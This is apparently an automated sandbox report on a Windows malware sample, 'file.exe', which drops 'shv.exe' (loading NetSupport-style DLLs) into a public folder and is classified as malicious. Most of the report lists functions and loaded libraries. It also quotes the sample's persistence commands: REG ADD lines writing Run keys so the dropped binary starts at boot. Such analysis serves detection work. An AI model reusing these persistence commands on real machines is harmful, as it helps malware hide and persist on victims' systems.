Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E78A310	0_2_00007FF70E78A310
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E79126C	0_2_00007FF70E79126C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00007FF70E787288	0_2_00007FF70E787288
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110733B0	6_2_110733B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11029590	6_2_11029590
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11061C90	6_2_11061C90
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11033010	6_2_11033010
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11163220	6_2_11163220
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1102B5F0	6_2_1102B5F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11167485	6_2_11167485
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110454F0	6_2_110454F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1101B760	6_2_1101B760
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_111258B0	6_2_111258B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1101BBA0	6_2_1101BBA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11087C60	6_2_11087C60
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1116DFCB	6_2_1116DFCB
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11070090	6_2_11070090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11080480	6_2_11080480
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1115E980	6_2_1115E980
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1101C9C0	6_2_1101C9C0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_110088AB	6_2_110088AB
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_11050D80	6_2_11050D80
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1CA980	6_2_6D1CA980
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1F3DB8	6_2_6D1F3DB8
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1F4910	6_2_6D1F4910
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_6D1F3923	6_2_6D1F3923
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11061C90	9_2_11061C90
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11033010	9_2_11033010
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110733B0	9_2_110733B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11163220	9_2_11163220
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11029590	9_2_11029590
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1102B5F0	9_2_1102B5F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11167485	9_2_11167485
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110454F0	9_2_110454F0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1101B760	9_2_1101B760
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_111258B0	9_2_111258B0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1101BBA0	9_2_1101BBA0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11087C60	9_2_11087C60
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1116DFCB	9_2_1116DFCB
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11070090	9_2_11070090
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11080480	9_2_11080480
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1115E980	9_2_1115E980
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1101C9C0	9_2_1101C9C0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_110088AB	9_2_110088AB
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_11050D80	9_2_11050D80

Source: C:\Users\Public\Netstat\shv.exe

Process token adjusted: Security

Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 110B7A20 appears 43 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11146450 appears 1223 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 1109D8C0 appears 32 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 6D1C30A0 appears 31 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11146EC0 appears 48 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 110278E0 appears 94 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 6D1D7D00 appears 67 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 6D1C6F50 appears 72 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 1116F010 appears 74 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11029450 appears 2011 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 111603E3 appears 82 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11173663 appears 40 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 1105DD10 appears 585 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11081BB0 appears 85 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 1105DE40 appears 54 times
Source: C:\Users\Public\Netstat\shv.exe	Code function: String function: 11164010 appears 64 times

Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamehtctl32.dll2 vs file.exe
Source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametcctl32.dll2 vs file.exe
Source: file.exe, 00000000.00000003.2140610512.00000229E9617000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamepcicl32.dll2 vs file.exe

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"

Source: classification engine

Classification label: mal96.rans.evad.winEXE@20/13@1/2

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E78B6D8 GetLastError,FormatMessageW,LocalFree,

0_2_00007FF70E78B6D8

Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	6_2_1109D440
Source: C:\Users\Public\Netstat\shv.exe	Code function: 6_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,	6_2_1109D4D0
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1109D440 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,	9_2_1109D440
Source: C:\Users\Public\Netstat\shv.exe	Code function: 9_2_1109D4D0 AdjustTokenPrivileges,CloseHandle,	9_2_1109D4D0

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11115B70 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,

6_2_11115B70

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00007FF70E7A8624 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipAlloc,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,

0_2_00007FF70E7A8624

Source: C:\Users\Public\Netstat\shv.exe

Code function: 6_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,

6_2_11127E10

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\Public\Netstat

Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Windows\win.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 39%

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: unknown	Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: unknown	Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: unknown	Process created: C:\Users\Public\Netstat\shv.exe "C:\Users\Public\Netstat\shv.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dxgidebug.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dbgcore.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcihooks.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: riched32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pciinv.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicl32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcichek.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: pcicapi.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nsmtrace.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: nslsp.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe	Section loaded: msasn1.dll	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\Public\Netstat\shv.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: file.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: file.exe

Static file information: File size 2283788 > 1048576

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\Public\Netstat\msvcr100.dll

Jump to behavior

Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: file.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

